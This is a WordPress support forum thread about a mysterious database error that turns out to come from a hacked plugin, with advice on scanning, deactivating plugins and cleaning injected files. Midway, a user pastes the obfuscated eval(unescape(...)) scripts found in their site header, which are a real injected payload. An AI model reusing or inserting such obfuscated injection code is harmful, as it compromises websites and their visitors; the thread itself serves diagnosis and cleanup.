Weird Database Error
-
Hello Everyone, I need some help
I keep getting this weird error sometimes on the top of my site.
Couldn't connect to database server.Couldn't find database jimbob_jc.An unexpected problem has occured with the application. SELECT statscurl_id FROM <code>statscurl</code> WHERE statscurl_ip = '';Can anyone tell me what the hell this is?
-
Is the database named ‘jimbob_jc’ part of your site or one that you have set up? If it is, then your connection details are wrong and you’ll need to change those.
If it’s not, then your site has most likely been hacked to include some code from an exteral source that’s trying to connect to that databse.
thats not my database name.
Then see my second point…
If it’s not, then your site has most likely been hacked to include some code from an exteral source that’s trying to connect to that databse.
There’s a lot of information on the forums here about fixing hacks, so do some searching and see what you can find.
ive been trying to find something about it but cant. all the plugins im using are from the wordpress plugin directory
After a quick two-second search on the forum here…
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://wordpress.org/support/topic/wordpress-hacking-in-32012?replies=3Out of over 7,000 results…
I’m pretty sure @spnweb meant he couldn’t find anything on ‘jimbob_jc’ specifically, not so much about WordPress getting hacked in general.
I had the same error show up on my front-end….
I found that my Facebook Page “Like Box” social plugin was the cause. When I disabled it, the error didn’t show up anymore.
I’m not guaranteeing this to be the cause or solution, as I just barely found out and hadn’t had too much time to troubleshoot, but it seems to be working for me. I’ll try to let you know if I can get the “Like Box” back without the error.
This was a hack… an injection of code (aka malware.)
And yes, it was a plugin that caused it. That’s what I get for testing unofficially released plugins not in the WordPress.org repo yet.This is a reliable and quick way to check for malware http://sitecheck.sucuri.net/scanner/ and has been mentioned many times around here. (I have no affiliation)
Or visit your site and do a “view source”… look around, most likely in the HEAD section for some encoded html or javascript or any scripts that call an outside domain you’re not familiar with.
Once you’ve verified something isn’t looking right, disable any plugins you think may not be legitimate, refresh your site and see if the malware strings are still present. If they are, then the code may have been injected into your theme or WordPress install. I won’t rewrite the wheel here, so just check those links above for more info on how to troubleshoot and solve.
Get it solved quick though! Google will eventually blacklist your site, and it sometimes takes awhile for that lift to come off after cleaning the injection.
I had this error pop up on 2 pages this morning, within the last 48 hours have installed three new plugin… Ultimate security, Bad query blocker and duplicator & the standard myriad of hand coded security necessary for a adequate install hardening. {htcaccess, hiding files, header mods}.
I had recently had to nuke another security plugin install manually from my directory as it conflicted with plugins.
I did not turn up a search result for the strings. I did run across a post on stackoverflow which curiously enough popped up with in the last 36 hours of this event. here .
Perhaps a code update witha shared plugin is conflicting?
Changing the template applied within the page attribute that I had applied to the page made the error disappear, but as sneedderek implied I definitely get a malware return from the scan link he provided. Further findings welcome…i found this weird code in the header
<script type="text/javascript"> <!-- eval(unescape('%66%75%6e%63%74%69%6f%6e%20%62%30%37%36%64%30%33%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%37%32%31%35%38%36%36%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%35%36%36%31%34%36%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%33%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a')); eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%62%30%37%36%64%30%33%28%27') + '%3e%6b%6e%6d%6b%1e%69%67%6f%3c%25%74%77%71%6b%6a%76%66%61%64%74%22%1b%67%65%3c%23%64%62%72%5c%5f%66%69%75%64%6e%75%58%67%73%6e%6a%68%5c%58%6a%5a%6b%6e%68%2c%77%73%7e%6f%61%73%63%67%64%77%2b%64%76%77%26%15%1b%66%6c%64%66%3c%22%64%75%77%6a%35%24%2a%77%77%72%2e%72%76%61%6b%60%6a%73%78%2d%6f%6c%62%29%28%29%31%35%34%2b%76%65%2c%63%6f%6d%74%64%6d%70%28%6b%6e%70%6c%60%68%73%2a%65%6a%75%63%6b%77%59%62%79%60%6f%68%59%5b%69%2c%6c%6b%6a%2b%72%79%70%6a%61%76%29%66%58%5e%5a%69%2c%62%78%76%3f%70%64%6a%3c%28%2a%2a%22%1a%73%7e%6b%61%39%22%74%64%73%70%28%66%77%72%2c%1b%69%61%67%63%58%3c%25%5a%6f%6e%26%15%2a%38%09%01%0f%01%3f%71%64%69%61%6f%79%1b%72%75%6b%67%3c%22%70%66%73%76%2e%6f%58%70%5d%76%65%69%60%6c%75%22%1a%72%67%66%39%27%63%74%77%6b%36%28%2a%73%76%7c%2d%77%73%66%6a%60%6b%70%74%2d%6b%6d%6c%2a%6e%6f%6b%2e%61%76%25%3f%3f%2b%72%68%69%65%6e%77%3e%0c%01%0b%03%3f%77%62%67%60%6e%72%1b%74%70%6b%63%3e%22%76%60%7d%77%2f%64%58%76%58%76%61%6b%60%6a%73%2c%1b%73%6c%66%3f%22%63%70%75%6b%30%2e%24%72%77%77%2d%71%76%66%6e%62%6b%76%72%23%6a%6c%67%2a%2b%29%36%30%36%2a%73%6f%22%66%6f%68%77%67%6d%77%2d%69%6f%75%66%6e%6d%73%2f%66%69%75%64%6e%75%58%67%73%6e%6a%68%5c%58%6a%2c%6b%6e%68%2a%77%62%67%60%6e%72%76%29%60%6c%75%5b%5a%67%5c%57%5a%73%63%69%63%6b%77%2a%63%76%3b%71%6a%69%39%2d%2d%2b%22%3d%38%28%76%67%6d%6e%6b%72%38%0c%02%0c%01%38%74%66%68%64%65%77%1e%72%70%68%64%3c%25%75%64%72%73%24%61%5d%70%58%75%66%69%67%69%77%23%39%02%01%2f%24%1b%3c%18%5e%41%45%38%56%3c%50%1b%24%2f%0c%02%75%58%6e%19%40%4d%56%37%5a%43%3d%39%59%38%61%5f%71%1b%3d%1f%70%19%5d%64%58%70%74%69%68%1b%31%18%67%79%77%6e%34%5f%29%5f%2a%75%70%72%2c%76%78%66%6c%65%6b%74%76%2d%6d%6b%62%5e%2e%26%29%33%32%34%5c%2a%72%6c%2e%58%66%68%6e%6d%5a%2f%58%64%6c%60%6a%2e%58%60%5c%7d%2d%6e%66%6b%1a%2f%19%6a%68%6d%67%60%17%31%1c%2e%28%31%32%33%34%37%2b%34%61%17%7c%3b%09%01%29%21%1b%5b%5e%3d%1a%25%24%0c%04%3a%2a%75%66%69%67%69%77%3c7215866%37%32%38%36%33%33%36' + unescape('%27%29%29%3b')); // --> </script> <script type="text/javascript"> <!-- eval(unescape('%66%75%6e%63%74%69%6f%6e%20%71%31%31%38%64%37%65%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%32%33%38%31%38%32%38%30%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%35%39%35%33%33%38%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%33%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a')); eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%71%31%31%38%64%37%65%28%27') + '%3d%76%69%6f%67%6b%73%18%78%73%6e%61%32%1b%77%6b%75%70%2a%65%5b%7a%5b%73%63%67%62%6b%78%1f%1c%76%6d%65%33%1a%66%72%79%69%31%25%2c%75%72%76%2e%6e%6b%71%61%67%72%64%22%60%6d%6c%2e%5b%6e%5b%76%2f%6f%6a%74%6b%6f%77%2a%65%6b%7b%67%6c%75%22%2a%2d%3a%2b%31%2d%68%63%62%2e%64%73%17%3f%3f%25%70%61%69%64%68%78%3e23818280%34%36%39%30%31%36%32' + unescape('%27%29%29%3b')); // --> </script>but i dont know which plugin or page it’s coming from
Yep…. hackers often use encoded Unescape when hacking and inserting links. That’s what happened to me.
There are or at least used to be some legit reasons to encode like this, for example to hide a email address from spam bots. But more than likely that’s not the case here.
There are some decoder tools out there, I don’t know of any to recommend as I haven’t used one in years. But trusty Google will help.
I know it’s a pain, but I would start by deactivating plugin’s one-by-one, checking each time if this encoded script still appears. That’s the easiest 1st step to find the culprit.
Then go from there if you don’t find it in plugins. I’ve had injections in the past show up in Header and Footer php files. It could be anywhere really. If you have an awesome web host, they may help you too as they don’t want that stuff spreading ;).
Good luck!
Hacks like this aren’t added by a plugin, or theme.
They are dong using vunerable files in your plugin on theme.
Once the site has been hacked, you can find many files, including core WordPress files, have been modified by the hack without you knowing. The most that I’ve seen on one far is 24.
Also, don’t check the files that you have locally. Those files will not have changed. The files on your server will have changed so you can download them and go through them again. You will most likely get some of the files blocked from your anti-virus software though.
i found the problem and removed it, it was a plugin.
the issue has been resolved.
thanks for the help everyone.
@michael.mariart
I guess I needed to be more specific…….
I didn’t mean for anyone to understand that the malware was “added by a plugin or theme”
……. with our issue, the malware was located in a plugin & theme we had. Like you said, these files were “modified” by the hack. This is why I used the word “injection”… of which implies this happened in a server environment.@spnweb
Awesome. Congrats on resolving your issue!These resources will help you:
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://wordpress.org/support/topic/268083#post-1065779
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://ottopress.com/2009/hacked-wordpress-backdoors/More Resources:
http://sitecheck.sucuri.net/scanner/
http://www.unmaskparasites.com/
http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html
http://codex.wordpress.org/Hardening_WordPress
http://www.studiopress.com/tips/wordpress-site-security.htm
The topic ‘Weird Database Error’ is closed to new replies.